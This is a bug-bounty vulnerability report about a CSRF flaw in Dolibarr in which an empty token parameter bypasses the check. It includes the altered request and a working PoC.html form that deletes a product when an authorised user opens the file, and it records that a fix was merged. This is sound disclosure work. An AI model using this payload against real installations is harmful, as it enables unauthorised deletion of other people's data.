Cross-Site Request Forgery (CSRF) in dolibarr/dolibarr

Valid

Reported on

Jul 18th 2021


✍️ Description

Attacker can delete any Product for any user with CSRF vulnerability when the Admin or SuperAdmin or an authorized user click on PoC.html file, it is enough to attacker know the Product id on server.

I convert the

GET /product/card.php?id=3265&action=confirm_delete&confirm=yes&token=a8cba385ad68bb894b54ae522ed5bb78 HTTP/2

to this

GET /product/card.php?id=3266&action=confirm_delete&token=&confirm=yes HTTP/2

and then the CSRF token bypassed.

🕵️‍♂️ Proof of Concept

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://demo.dolibarr.org/product/card.php">
      <input type="hidden" name="id" value="3266" />
      <input type="hidden" name="action" value="confirm&#95;delete" />
      <input type="hidden" name="token" value="" />
      <input type="hidden" name="confirm" value="yes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

💥 Impact

This vulnerability is capable of Delete any produt.

We have contacted a member of the dolibarr team and are waiting to hear back 4 months ago
Laurent Destailleur validated this vulnerability 4 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Laurent Destailleur confirmed that a fix has been merged on 08e06f 4 months ago
Laurent Destailleur has been awarded the fix bounty